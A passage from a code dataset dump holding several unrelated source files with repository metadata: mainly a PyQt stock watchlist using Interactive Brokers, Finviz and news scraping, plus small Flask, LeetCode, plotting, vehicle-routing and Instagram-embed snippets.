self.setStyleSheet(qdarktheme.setup_theme())\r\n\r\n # Crear una tabla para mostrar los datos del mercado\r\n self.table = QTableWidget()\r\n self.table.setColumnCount(21)\r\n self.table.setHorizontalHeaderLabels(['Symbol', 'Halted', 'Sector', 'Industry', 'Close', 'Open', 'Gap', 'Last Price', 'Change', 'Float', 'Volumen', 'Vol/Float', 'News', 'Offerings Past', 'Offerings Future', 'Splits Past', 'Splits Future', 'Halteds Past', 'Halteds Future', 'Patrones Past', 'Patrones Future'])\r\n\r\n # Campo de entrada de texto para introducir los símbolos de los contratos\r\n self.symbolInput = QLineEdit()\r\n self.symbolInput.returnPressed.connect(self.add_symbols)\r\n\r\n # Botón para agregar los símbolos introducidos por el usuario\r\n self.addButton = QPushButton(\"Agregar\")\r\n self.addButton.clicked.connect(self.add_symbols)\r\n\r\n # Configurar la tabla y los controles en un widget contenedor\r\n widget = QWidget()\r\n layout = QVBoxLayout(widget)\r\n layout.addWidget(self.symbolInput)\r\n 
layout.addWidget(self.addButton)\r\n layout.addWidget(self.table)\r\n\r\n # Configurar el widget contenedor como el contenido central de la ventana principal\r\n self.setCentralWidget(widget)\r\n\r\n # Definir un diccionario para almacenar los precios del mercado\r\n self.last_price = {}\r\n self.get_ticker = {}\r\n self.sector_data = {} # Almacenar los datos del sector por símbolo\r\n # Leer los símbolos desde el archivo y agregarlos a la tabla\r\n with open('symbols.txt', 'r') as file:\r\n symbols = [line.strip().split(',')[0] for line in file]\r\n contracts = [Stock(symbol.strip().upper(), 'SMART', 'USD') for symbol in symbols]\r\n for contract in contracts:\r\n asyncio.ensure_future(self.update_market_data(contract))\r\n asyncio.ensure_future(self.get_sectorindustriafloat_finviz_data(contract.symbol)) # Asynchronously get Finviz data\r\n asyncio.ensure_future(self.check_news_updates())# Iniciar la verificación de noticias\r\n\r\n # Ejecutar el bucle de eventos de asyncio mediante QTimer\r\n self.timer = QTimer()\r\n self.timer.timeout.connect(self.update_event_loop)\r\n self.timer.start(0)\r\n\r\n # Asignar el evento de menú contextual a la tabla\r\n self.table.setContextMenuPolicy(3) # 3 corresponde a Qt.CustomContextMenu\r\n self.table.customContextMenuRequested.connect(self.context_menu_event)\r\n\r\n self.update_count = 0\r\n\r\n # Agregar los símbolos introducidos por el usuario como contratos a monitorear\r\n def add_symbols(self):\r\n symbols = self.symbolInput.text().split(',')\r\n contracts = [Stock(symbol.strip().upper(), 'SMART', 'USD') for symbol in symbols]\r\n\r\n unique_contracts = [contract for contract in contracts if contract.symbol not in self.current_symbols]\r\n\r\n if not unique_contracts:\r\n self.symbolInput.clear()\r\n return\r\n\r\n with open('symbols.txt', 'a') as file:\r\n for contract in unique_contracts:\r\n symbol = contract.symbol\r\n current_date = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\r\n file.write(f\"{symbol},{current_date}\\n\")\r\n self.current_symbols.add(symbol) # Agregar el símbolo a los símbolos actuales\r\n\r\n with open('symbols_history.txt', 'a') as file:\r\n for contract in unique_contracts:\r\n symbol = contract.symbol\r\n current_date = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\r\n file.write(f\"{symbol},{current_date}, agregado\\n\")\r\n self.current_symbols.add(symbol) # Agregar el símbolo a los símbolos actuales\r\n\r\n for contract in unique_contracts:\r\n print(\"probando\")\r\n asyncio.ensure_future(self.update_market_data(contract))\r\n asyncio.ensure_future(self.get_sectorindustriafloat_finviz_data(contract.symbol))\r\n asyncio.ensure_future(self.check_news_updates())# Iniciar la verificación de noticias\r\n\r\n self.symbolInput.clear()\r\n\r\n def find_row_by_symbol(self, symbol):\r\n for row in range(self.table.rowCount()):\r\n item = self.table.item(row, 0) # Assuming symbol is in the first column\r\n if item and item.text() == symbol:\r\n return row\r\n return -1 # Symbol not found\r\n\r\n async def check_news_updates(self):\r\n while True:\r\n current_time = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\r\n \r\n for symbol in self.current_symbols:\r\n print(\"check_news_updates\")\r\n dropdown = self.get_news(symbol)\r\n row = self.find_row_by_symbol(symbol)\r\n current_news = self.table.cellWidget(row, 12)\r\n if dropdown.currentText() != current_news.currentText():\r\n self.table.setCellWidget(row, 12, dropdown)\r\n dropdown.setStyleSheet(\"background-color: darkYellow\")\r\n await asyncio.sleep(10) # 
Verificar las noticias cada 60 segundos\r\n\r\n\r\n\r\n\r\n async def get_sectorindustriafloat_finviz_data(self, symbol):\r\n overview = Overview()\r\n ### HOT SECTORS AND INDUSTRIES\r\n def fetch_hot_sectors():\r\n hot_sectors = overview.screener_view(group='Sector', order='Change')\r\n return hot_sectors\r\n def fetch_hot_industries():\r\n hot_industries = overview.screener_view(group='Industry', order='Change')\r\n return hot_industries\r\n # Utiliza asyncio.gather para ejecutar las llamadas en paralelo\r\n screener_table_sectors, screener_table_industries, infofinviz = await asyncio.gather(\r\n asyncio.get_event_loop().run_in_executor(None, fetch_hot_sectors),\r\n asyncio.get_event_loop().run_in_executor(None, fetch_hot_industries),\r\n asyncio.get_event_loop().run_in_executor(None, finviz.get_stock, symbol)\r\n )\r\n screener_table_sorted_sectors = screener_table_sectors.sort_values(by='\\n\\nChange', ascending=False)\r\n name_change_df_sectors = screener_table_sorted_sectors[[\"Name\", \"\\n\\nChange\"]]\r\n\r\n\r\n # Obtener los valores de los índices en variables\r\n sectornames = name_change_df_sectors[\"Name\"].values\r\n changes = name_change_df_sectors[\"\\n\\nChange\"].values\r\n name_change_dict_sector = {}\r\n for n, (name, change) in enumerate(zip(sectornames, changes), start=1):\r\n name_change_dict_sector[name] = {'id': n, 'change': change}\r\n\r\n screener_table_sorted_industries = screener_table_industries.sort_values(by='\\n\\nChange', ascending=False)\r\n name_change_df_industries = screener_table_sorted_industries[[\"Name\", \"\\n\\nChange\"]]\r\n\r\n # Obtener los valores de los índices en variables\r\n industriesnames = name_change_df_industries[\"Name\"].values\r\n changes = name_change_df_industries[\"\\n\\nChange\"].values\r\n name_change_dict_industry = {}\r\n for n, (name, change) in enumerate(zip(industriesnames, changes), start=1):\r\n name_change_dict_industry[name] = {'id': n, 'change': change}\r\n\r\n ### SECTORS AND INDUSTRIES DE CADA COMPAÑIA\r\n if infofinviz['Sector'] not in ['Communication Services', 'Technology', 'Consumer Cyclical', 'Financial',\r\n 'Basic Materials', 'Energy', 'Industrials', 'Healthcare',\r\n 'Consumer Defensive', 'Real Estate', 'Utilities']:\r\n symbol = infofinviz['Company']\r\n sector = infofinviz['Industry']\r\n industry = infofinviz['Country']\r\n shares_float = infofinviz['Shs Float']\r\n else:\r\n symbol = infofinviz['Company']\r\n sector = infofinviz['Sector']\r\n industry = infofinviz['Industry']\r\n shares_float = infofinviz['Shs Float']\r\n\r\n self.sector_data[symbol] = (sector, industry, shares_float, name_change_dict_sector, name_change_dict_industry)\r\n\r\n\r\n\r\n\r\n\r\n # Definir una función asincrónica para solicitar los datos del mercado y actualizar la tabla\r\n async def update_market_data(self, contract):\r\n # Solicitar los datos del mercado\r\n ticker = ib.reqMktData(contract)\r\n # Guarda toda la info en esta lista aquí porque si se hace en el bucle la ventana va mal\r\n self.get_ticker[contract.symbol] = ticker\r\n \r\n while True:\r\n if ticker.last != self.last_price.get(contract.symbol):\r\n self.last_price[contract.symbol] = ticker.last\r\n self.update_table()\r\n\r\n # Verificar si el símbolo aún está presente en el archivo \"symbols.txt\"\r\n with open('symbols.txt', 'r') as file:\r\n symbols = [line.strip().split(',')[0] for line in file]\r\n\r\n if contract.symbol not in symbols:\r\n self.remove_symbol_from_table(contract.symbol) # Eliminar el símbolo de la tabla\r\n del 
self.last_price[contract.symbol] # Eliminar el símbolo del diccionario last_price\r\n break # Salir del bucle while\r\n\r\n await asyncio.sleep(0.01)\r\n\r\n\r\n def context_menu_event(self, pos):\r\n context_menu = QMenu(self)\r\n\r\n remove_action = QAction(\"Eliminar\", self)\r\n remove_action.triggered.connect(self.remove_symbol)\r\n context_menu.addAction(remove_action)\r\n\r\n # Obtener la posición del ítem seleccionado\r\n selected_indexes = self.table.selectedIndexes()\r\n if selected_indexes:\r\n symbol_item = self.table.item(selected_indexes[0].row(), 0)\r\n symbol = symbol_item.text()\r\n\r\n # Puedes agregar más acciones al menú contextual aquí\r\n\r\n # Ejecutar el menú contextual en la posición especificada\r\n context_menu.exec_(self.table.viewport().mapToGlobal(pos))\r\n\r\n def remove_symbol_from_table(self, symbol):\r\n rows = self.table.rowCount()\r\n for row in range(rows):\r\n symbol_item = self.table.item(row, 0)\r\n if symbol_item and symbol_item.text() == symbol:\r\n self.table.removeRow(row)\r\n break\r\n\r\n def remove_symbol(self):\r\n selected_indexes = self.table.selectedIndexes()\r\n if selected_indexes:\r\n symbol_item = self.table.item(selected_indexes[0].row(), 0)\r\n symbol = symbol_item.text()\r\n\r\n with open('symbols.txt', 'r') as file:\r\n lines = file.readlines()\r\n\r\n updated_lines = []\r\n for line in lines:\r\n stored_symbol = line.strip().split(',')[0]\r\n if stored_symbol != symbol:\r\n updated_lines.append(line)\r\n\r\n with open('symbols.txt', 'w') as file:\r\n file.writelines(updated_lines)\r\n\r\n if symbol in self.current_symbols: # Verificar si el símbolo existe en el conjunto\r\n self.table.removeRow(selected_indexes[0].row())\r\n self.current_symbols.remove(symbol) # Eliminar el símbolo de los símbolos actuales\r\n del self.last_price[symbol] # Eliminar el símbolo del diccionario last_price\r\n self.update_table() # Actualizar la tabla con los datos modificados\r\n self.remove_symbol_from_table(symbol) # Eliminar el símbolo de la tabla\r\n\r\n current_date = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\r\n with open('symbols_history.txt', 'a') as file:\r\n file.write(f\"{symbol},{current_date}, eliminado\\n\")\r\n\r\n def get_news(self, symbol):\r\n dropdown = QComboBox()\r\n results = []\r\n print(\"Checkeando noticias\")\r\n def process_yahoo_news():\r\n try:\r\n # Obtain news with yfinance\r\n ticker = yf.Ticker(symbol)\r\n news = ticker.news\r\n for n in news:\r\n titulo = n['title']\r\n hora = n['providerPublishTime']\r\n link = n['link']\r\n dt = datetime.fromtimestamp(hora)\r\n ny_timezone = pytz.timezone('America/New_York')\r\n ny_dt = dt.astimezone(ny_timezone)\r\n ny_time_str = ny_dt.strftime('%d-%m-%Y %H:%M:%S')\r\n\r\n results.append((ny_time_str, f\"YH = {symbol} | {ny_time_str} de NY | {titulo}\", link))\r\n\r\n except Exception as e:\r\n print(f\"Error al obtener noticias de Yahoo Finance para {symbol}: {e}\")\r\n\r\n def process_stock_titan_news():\r\n try:\r\n # Obtain news from stock_titan\r\n url = 'https://www.stocktitan.net/news/' + symbol + '/'\r\n response = requests.get(url)\r\n soup = BeautifulSoup(response.content, 'html.parser')\r\n articles = soup.find_all('article')\r\n for article in articles:\r\n hora = article.find('div', class_='date').text\r\n hora = datetime.strptime(hora, \"%m/%d/%y %I:%M %p\")\r\n hora = hora.strftime(\"%d-%m-%Y %H:%M:%S\")\r\n titulo = article.find('div', {'class': 'title'}).text\r\n enlace = article.find('div', {'class': 'title'}).find('a')['href']\r\n\r\n results.append((hora, 
f\"ST = {symbol} | {hora} de NY | {titulo}\", enlace))\r\n\r\n except Exception as e:\r\n print(f\"Error al obtener noticias de Stock Titan para {symbol}: {e}\")\r\n\r\n with concurrent.futures.ThreadPoolExecutor() as executor:\r\n future_yahoo = executor.submit(process_yahoo_news)\r\n future_stock_titan = executor.submit(process_stock_titan_news)\r\n\r\n # Esperar a que se completen las tareas en paralelo\r\n concurrent.futures.wait([future_yahoo, future_stock_titan])\r\n\r\n # Sort the results by time\r\n results = sorted(results, key=lambda x: datetime.strptime(x[0], '%d-%m-%Y %H:%M:%S'), reverse=True)\r\n\r\n # Show the results in the dropdown menu\r\n for index, result in enumerate(results): # Added index variable here\r\n dropdown.addItem(result[1])\r\n dropdown.setItemData(index, result[2], Qt.UserRole) # Added index variable here\r\n\r\n # Set colors if it has YH or ST\r\n for index, result in enumerate(results):\r\n news_date = datetime.strptime(result[0], '%d-%m-%Y %H:%M:%S').date()\r\n \r\n if news_date == date.today():\r\n # Aplicar estilo si la fecha es hoy\r\n dropdown.setStyleSheet(\"background-color: darkBlue\")\r\n if 'YH' in result[1]:\r\n dropdown.setItemData(index, QBrush(QColor('#470463')), Qt.BackgroundRole)\r\n dropdown.setItemData(index, QBrush(QColor('white')), Qt.ForegroundRole)\r\n elif 'ST' in result[1]:\r\n dropdown.setItemData(index, QBrush(QColor('#020a40')), Qt.BackgroundRole)\r\n dropdown.setItemData(index, QBrush(QColor('white')), Qt.ForegroundRole)\r\n\r\n dropdown.activated.connect(self.open_news_link)\r\n\r\n return dropdown\r\n\r\n def get_splits(self, symbol):\r\n print('HACIENDO SPLITS')\r\n dropdown_splits = QComboBox()\r\n results_splits = []\r\n\r\n def process_splits():\r\n try:\r\n ticker = yf.Ticker(symbol)\r\n splits = ticker.splits\r\n\r\n for split_date, split_ratio in splits.items():\r\n split_date_str = split_date.strftime(\"%d-%m-%Y\")\r\n\r\n if split_ratio > 1:\r\n split_type = \"Split\"\r\n precio_anterior = 5\r\n new_price = precio_anterior / split_ratio\r\n split_info = f\"{symbol} - {split_date_str} - SPLIT (más acciones, menor precio) de {split_ratio} a 1. Si el precio anterior era de {precio_anterior}, ahora será de {new_price}. Dividir precio entre {split_ratio}\"\r\n #print(symbol, split_date_str, split_info)\r\n else:\r\n split_type = \"Reverse split\"\r\n split_ratio = Fraction(1 / split_ratio).limit_denominator(1000)\r\n precio_anterior = 5\r\n new_price = precio_anterior * split_ratio\r\n split_info = f\"{symbol} - {split_date_str} - REVERSE SPLIT (menos acciones, mayor precio) de 1 a {split_ratio}. Si el precio anterior era de {precio_anterior}, ahora será de {new_price}. 
Multiplicar precio por {split_ratio}\"\r\n #print(symbol, split_date_str, split_info)\r\n results_splits.append((symbol, \"-\", split_date_str, \"-\", split_type, split_info))\r\n\r\n except Exception as e:\r\n print(f\"Error al obtener splits de Yahoo Finance para {symbol}: {e}\")\r\n\r\n with concurrent.futures.ThreadPoolExecutor() as executor:\r\n future_splits = executor.submit(process_splits)\r\n # Esperar a que se completen las tareas en paralelo\r\n concurrent.futures.wait([future_splits])\r\n # Sort the results by time\r\n results_splits = sorted(results_splits, key=lambda x: datetime.strptime(x[2], '%d-%m-%Y'), reverse=True)\r\n # Show the results in the splits dropdown menu\r\n for index, result in enumerate(results_splits):\r\n dropdown_splits.addItem(result[5]) # Agregar result[5] en lugar de result[1]\r\n dropdown_splits.setItemData(index, result[5], Qt.UserRole) # Usar result[5] en lugar de result[2]\r\n\r\n return dropdown_splits\r\n\r\n # Actualizar la tabla con los datos del mercado\r\n def update_table(self):\r\n self.table.setRowCount(len(self.last_price))\r\n row = 0\r\n for symbol, ticker in self.last_price.items():\r\n ticker = self.get_ticker.get(symbol)\r\n item_symbol = QTableWidgetItem(symbol)\r\n item_symbol.setTextAlignment(0x0084) # Alinear el texto en mayúsculas\r\n item_halted = QTableWidgetItem(str(ticker.halted))\r\n if ticker.halted == 2.0 or ticker.halted == 1.0:\r\n item_halted.setBackground(Qt.darkRed)\r\n\r\n sector, industry, shares_float, name_change_dict_sector, name_change_dict_industry = self.sector_data.get(symbol, (\"\", \"\", \"\", {}, {}))\r\n changes_sectors = name_change_dict_sector.get(sector, {}).get('change', \"\")\r\n changes_industries = name_change_dict_industry.get(industry, {}).get('change', \"\")\r\n\r\n if changes_sectors:\r\n changes_sectors = f\"{float(changes_sectors) * 100:.2f}%\"\r\n item_sector = QTableWidgetItem(f\"{name_change_dict_sector.get(sector, {}).get('id', '')} - {sector} ({changes_sectors})\")\r\n if changes_sectors:\r\n changes_sectors = float(changes_sectors.strip(\"%\"))\r\n if changes_sectors > 0:\r\n item_sector.setBackground(Qt.darkYellow) # Dark green\r\n\r\n\r\n \r\n if changes_industries:\r\n changes_industries = f\"{float(changes_industries) * 100:.2f}%\"\r\n item_industry = QTableWidgetItem(f\"{name_change_dict_industry.get(industry, {}).get('id', '')} - {industry} ({changes_industries})\")\r\n if changes_industries:\r\n changes_industries = float(changes_industries.strip(\"%\"))\r\n if changes_industries > 0:\r\n item_industry.setBackground(Qt.darkYellow) # Dark green\r\n\r\n\r\n\r\n\r\n item_last_price = QTableWidgetItem(str(ticker.last))\r\n item_close = QTableWidgetItem(str(ticker.close))\r\n item_open = QTableWidgetItem(str(ticker.open))\r\n gap = (ticker.open - ticker.close) / ticker.close * 100\r\n item_gap = QTableWidgetItem(f\"{gap:.2f}%\")\r\n change = (ticker.last - ticker.close) / ticker.close * 100\r\n item_change = QTableWidgetItem(f\"{change:.2f}%\")\r\n\r\n item_float = QTableWidgetItem(str(shares_float))\r\n\r\n ## VOLUMEN\r\n # Convertir el volumen del día a una cadena formateada\r\n volume = ticker.volume * 100\r\n if volume >= 1_000_000:\r\n volume_str = f\"{volume / 1_000_000:.2f}M\"\r\n elif volume >= 1_000:\r\n volume_str = f\"{volume / 1_000:.2f}k\"\r\n else:\r\n volume_str = str(volume)\r\n\r\n item_volumenDelDia = QTableWidgetItem(volume_str)\r\n\r\n float_value = None # Inicializar float_value\r\n if shares_float != '':\r\n value = float(shares_float[:-1])\r\n\r\n # Determinar 
el factor de conversión\r\n suffix = shares_float[-1]\r\n if suffix == 'M':\r\n conversion_factor = 1000000 # Multiplicar por 1,000,000 para convertir de \"M\" a millones completos\r\n elif suffix == 'B':\r\n conversion_factor = 1000000000 # Multiplicar por 1,000,000,000 para convertir de \"B\" a billones completos\r\n\r\n # Realizar la conversión\r\n float_value = value * conversion_factor\r\n\r\n # Obtener el volumen/float (%) y establecerlo en la columna 10\r\n item_volumenSobreFloat = QTableWidgetItem(\"\")\r\n if float_value is not None and not math.isnan(float_value):\r\n item_volumenSobreFloat = QTableWidgetItem(f\"{volume/float_value*100:.2f}%\")\r\n\r\n\r\n\r\n \r\n self.table.setItem(row, 0, item_symbol)\r\n self.table.setItem(row, 1, item_halted)\r\n self.table.setItem(row, 2, item_sector)\r\n self.table.setItem(row, 3, item_industry)\r\n self.table.setItem(row, 4, item_close)\r\n self.table.setItem(row, 5, item_open)\r\n self.table.setItem(row, 6, item_gap)\r\n self.table.setItem(row, 7, item_last_price)\r\n self.table.setItem(row, 8, item_change)\r\n self.table.setItem(row, 9, item_float)\r\n self.table.setItem(row, 10, item_volumenDelDia)\r\n self.table.setItem(row, 11, item_volumenSobreFloat)\r\n\r\n # Verificar si ya se ha creado el widget de noticias para la fila actual\r\n if self.table.cellWidget(row, 12) is None:\r\n # Si el widget de noticias no existe, crearlo y establecerlo en la celda\r\n news_dropdown = self.get_news(symbol)\r\n self.table.setCellWidget(row, 12, news_dropdown)\r\n # Verificar si ya se ha creado el widget de noticias para la fila actual\r\n if self.table.cellWidget(row, 15) is None:\r\n # Si el widget de noticias no existe, crearlo y establecerlo en la celda\r\n splits_dropdown = self.get_splits(symbol)\r\n self.table.setCellWidget(row, 15, splits_dropdown)\r\n\r\n row += 1\r\n # Incrementar el contador en cada llamada a la función\r\n self.update_count += 1\r\n # Establecer el tamaño de las columnas para que se expandan\r\n if self.update_count == 100:\r\n print(\"\\nAjustando columnas a texto\")\r\n self.table.resizeColumnsToContents()\r\n\r\n def open_news_link(self, index):\r\n selected_item = self.sender()\r\n link = selected_item.itemData(index, Qt.UserRole)\r\n webbrowser.open(link)\r\n # Función para actualizar el bucle de eventos de asyncio\r\n def update_event_loop(self):\r\n asyncio.get_event_loop().stop()\r\n asyncio.get_event_loop().run_forever()\r\n\r\n def closeEvent(self, event):\r\n # Obtener las solicitudes de reqMktData pendientes\r\n pending_requests = ib.pendingTickers()\r\n\r\n # Mostrar las solicitudes pendientes\r\n for ticker in pending_requests:\r\n print(\"Símbolo:\", ticker.contract.symbol)\r\n\r\n\r\n # Cancelar las solicitudes de reqMktData pendientes\r\n for ticker in pending_requests:\r\n ib.cancelMktData(ticker.contract)\r\n\r\n # Verificar que todas las solicitudes se hayan cancelado\r\n canceled_requests = ib.pendingTickers()\r\n if not canceled_requests:\r\n print(\"Todas las solicitudes de reqMktData se han cancelado correctamente\")\r\n else:\r\n print(\"\\n\", canceled_requests)\r\n print(\"\\nNo se pudieron cancelar todas las solicitudes de reqMktData\")\r\n\r\n # Desconectar de Interactive Brokers\r\n ib.disconnect()\r\n # Llamar al método closeEvent de la clase base para realizar el cierre de la ventana\r\n super().closeEvent(event)\r\n\r\n print(\"Desconectado de IBKR\")\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n mainWindow = MarketDataWindow()\r\n mainWindow.resize(800, 800)\r\n 
mainWindow.show()\r\n    sys.exit(app.exec_())","repo_name":"regholl/Stocks-Watchlist","sub_path":"splits.py","file_name":"splits.py","file_ext":"py","file_size_in_byte":25879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"}
+{"seq_id":"33717369618","text":"# Templates: jinja2\n\nfrom flask import Flask,render_template\n\napp = Flask(__name__)\n\n\n@app.route('/index')\ndef index():\n    data = {\n        'name': '张三',\n        'age': 18,\n        'mylist': [1, 2, 3, 4, 5, 6]\n    }\n    return render_template('index2.html', data=data)\n\n\ndef list_step(li):\n    \"\"\"Custom filter\"\"\"\n    return li[::2]\n\n\n# Register the filter: 1. the name of the custom function 2. the name used on the front end\napp.add_template_filter(list_step, 'li2')\n\n# li = [1, 2, 3, 4, 5]\n\n# print(list_step(li))\n\nif __name__ == '__main__':\n    app.run()\n","repo_name":"jjc09uiom/flaskStudy","sub_path":"test/模板.py","file_name":"模板.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"37219644791","text":"class Solution:\n    def maxSubsequence(self, nums: 'List[int]', k: int) -> 'List[int]':\n        hmp = {}\n        for i, n in enumerate(nums):\n            if n not in hmp:\n                hmp[n] = []\n            hmp[n].append(i)\n        \n        locs = []\n        for n in sorted(nums)[-k:]: #find the location of each number\n            locs.append(hmp[n].pop(0))\n        \n        locs.sort() #sort the location to make it a subsequence of the original array\n        output = []\n        for loc in locs:\n            output.append(nums[loc]) \n        return output\n\n    \n    \n","repo_name":"renjieliu/leetcode","sub_path":"2000_2499/2099.py","file_name":"2099.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
+{"seq_id":"35176990426","text":"age=int(input(\"Enter your age:\"))\nn=age\nfact=1\n\nwhile (age>1):\n\tfact*=age\n\tage-=1\nelse:\n\tprint(\"Python while loops have redundant else\")\nprint(\"Factorial of your age is\",fact)\n","repo_name":"Hemvati/Python","sub_path":"while.py","file_name":"while.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"11679364473","text":"import numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pickle\nfrom matplotlib.colors import Normalize\nfrom matplotlib import rc\nfrom matplotlib.colors import LogNorm\nimport glob\nimport ipdb\nfrom matplotlib.colors import LogNorm\nimport h5py as h5\n\nmethod = \"etks_hybrid\"\nstat = 'fore'\ntanl = 0.10\nmda = 'false'\n\nf = h5.File('./processed_all_smoother_state_diffusion_0.00_tanl_' + str(tanl).ljust(4,\"0\") + '_nanl_20000_burn_05000_mda_' + mda + '.h5', 'r')\n\n\ndef find_optimal_values(method, stat, data):\n    tuning_stat = 'anal'\n    tuned_rmse = np.array(f[method + '_' + tuning_stat + '_rmse'])\n    tuned_rmse_min_vals = np.min(tuned_rmse, axis=1)\n    lag, ens = np.shape(tuned_rmse_min_vals)\n    \n    stat_rmse = np.array(f[method +'_' + stat + '_rmse'])\n    stat_spread = np.array(f[method + '_' + stat + '_spread'])\n\n    rmse_vals = np.zeros([lag, ens])\n    spread_vals = np.zeros([lag, ens])\n\n    for i in range(lag):\n        for j in range(ens):\n            min_val = tuned_rmse_min_vals[i,j]\n            indx = tuned_rmse[i,:,j] == min_val\n\n            rmse_vals[i,j] = stat_rmse[i, indx, j]\n            spread_vals[i,j] = stat_spread[i, indx, j]\n    \n    rmse_vals = np.transpose(rmse_vals)\n    spread_vals = np.transpose(spread_vals)\n\n    return [rmse_vals, spread_vals]\n\nrmse, spread = find_optimal_values(method, stat, f)\n\n\nfig = plt.figure()\nax3 = fig.add_axes([.460, 
.13, .02, .80])\nax2 = fig.add_axes([.940, .13, .02, .80])\nax1 = fig.add_axes([.530, .13, .390, .80])\nax0 = fig.add_axes([.060, .13, .390, .80])\n\n\n\ncolor_map = sns.color_palette(\"husl\", 101)\nmax_scale = 0.50\nmin_scale = 0.00\n\n\nsns.heatmap(rmse, linewidth=0.5, ax=ax0, cbar_ax=ax3, vmin=min_scale, vmax=max_scale, cmap=color_map)\nsns.heatmap(spread, linewidth=0.5, ax=ax1, cbar_ax=ax2, vmin=min_scale, vmax=max_scale, cmap=color_map)\n\n\nax2.tick_params(\n        labelsize=20)\n\nax1.tick_params(\n        labelsize=20,\n        labelleft=False)\n\nax0.tick_params(\n        labelsize=20)\n\nax3.tick_params(\n        labelsize=20,\n        labelleft=False,\n        labelright=True,\n        right=True,\n        left=False)\nax2.tick_params(\n        labelsize=20,\n        labelleft=False,\n        labelright=True,\n        right=True,\n        left=False)\n\n\nx_labs = []\nfor i in range(15,44,2):\n    x_labs.append(str(i))\n\ny_labs = []\ny_vals = np.arange(1,53, 3)\nfor i in range(len(y_vals)):\n    if i % 1 == 0:\n        y_labs.append(str(y_vals[i]))\n    else:\n        y_labs.append('')\n\n\ny_labs = y_labs[::-1]\n\nax1.set_xticks(range(0,15))\nax0.set_xticks(range(0,15))\nax1.set_xticklabels(x_labs)\nax0.set_xticklabels(x_labs)\n#ax1.set_ylim([9,1])\n#ax0.set_ylim([9,1])\nax0.set_yticks(range(18))\nax0.set_yticklabels(y_labs, va='bottom')\nax1.set_yticks(range(18))\n\nif stat == 'anal':\n    stat = 'smoother'\n\nelif stat == 'filt':\n    stat = 'filter'\n\nelif stat == 'fore':\n    stat = 'forecast'\n\nplt.figtext(.2525, .05, stat + ' RMSE', horizontalalignment='center', verticalalignment='center', fontsize=24)\nplt.figtext(.7225, .05, stat + ' spread', horizontalalignment='center', verticalalignment='center', fontsize=24)\nplt.figtext(.015, .52, r'Lag length', horizontalalignment='center', verticalalignment='center', fontsize=24, rotation='90')\nplt.figtext(.50, .04, r'Ensemble size', horizontalalignment='center', verticalalignment='center', fontsize=24)\nplt.figtext(.5, .97, method + ', ' + ' mda ' + mda + ', ' + stat + ' statistics, optimally tuned inflation, shift 1',\n            horizontalalignment='center', verticalalignment='center', fontsize=24)\n\n\nplt.show()\n","repo_name":"cgrudz/DataAssimilationBenchmarks.jl","sub_path":"src/analysis/state_smoother/plt_smoother_state_rmse_spread_2_pane.py","file_name":"plt_smoother_state_rmse_spread_2_pane.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"}
+{"seq_id":"10326716713","text":"import csv\nimport numpy as np\nfrom configparser import ConfigParser\n\nfrom vehicle import Vehicle\nfrom visit import Visit\n\n\nclass Globals:\n\n    def __init__(self):\n        self.list_visits = []\n        self.distances = None\n        self.times = None\n        self.vehicle_model = None\n        self.config = ConfigParser()\n\n    def define(self, folder):\n        \"\"\"\n        Sets the global values list_visits (list of visits), distances (distance matrix),\n        times (time matrix), vehicle_model (vehicle model).\n\n        :param folder: Path of the folder containing the configuration files\n        visits.csv, distances.txt, times.txt and vehicle.ini\n        \"\"\"\n        with open(folder + 'visits.csv', newline='') as csvfile:\n            reader = csv.DictReader(csvfile)\n            for row in reader:\n                self.list_visits.append(Visit(int(row['visit_id']), row['visit_name'],\n                                              row['visit_lat'], row['visit_lon'], int(row['demand'])))\n\n        self.distances = np.loadtxt(folder + \"distances.txt\")\n        self.times = np.loadtxt(folder + \"times.txt\")\n        self.config.read(folder + \"vehicle.ini\")\n        self.vehicle_model = Vehicle(\n
self.getIntFromIni(\"max_dist\"),\n self.getIntFromIni(\"capacity\"),\n self.getIntFromIni(\"charge_fast\"),\n self.getIntFromIni(\"charge_medium\"),\n self.getIntFromIni(\"charge_slow\"),\n self.getStrFromIni(\"start_time\"),\n self.getStrFromIni(\"end_time\")\n )\n\n def getIntFromIni(self, value: str):\n return self.config.getint(\"Vehicle\", value)\n\n def getStrFromIni(self, value: str):\n return self.config.get(\"Vehicle\", value)\n","repo_name":"Remy-Varinier/TP_Energie","sub_path":"TP/main/globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37128846355","text":"from urllib.parse import urlparse\n\nimport re\nimport requests\nfrom markdown.util import etree\n\nfrom kazimir.Token import UrlToken, is_url\n\npattr = re.compile(r'https?://(www\\.)?instagram\\.com/p/(?P[\\w\\d]+)/?(.*)$')\n\n\nclass InstagramToken(UrlToken):\n @staticmethod\n def test(data: str):\n if not is_url(data):\n return False\n\n url = urlparse(data)\n return url.netloc in ['www.instagram.com', 'instagram.com']\n\n def __init__(self, data: str) -> None:\n super().__init__(data=data)\n self.name = 'instagram'\n\n async def get_data(self):\n m = pattr.match(self.data)\n embed = None\n if m:\n m = m.group('media')\n embed = await embed_instagram(m)\n\n return {\n 'url': self.data,\n 'embed': embed,\n }\n\n\nasync def embed_instagram(media):\n \"\"\"\n
    Returns the oEmbed HTML for the given media: an Instagram blockquote\n    embed snippet with a bare data-instgrm-captioned attribute (full example\n    markup omitted).
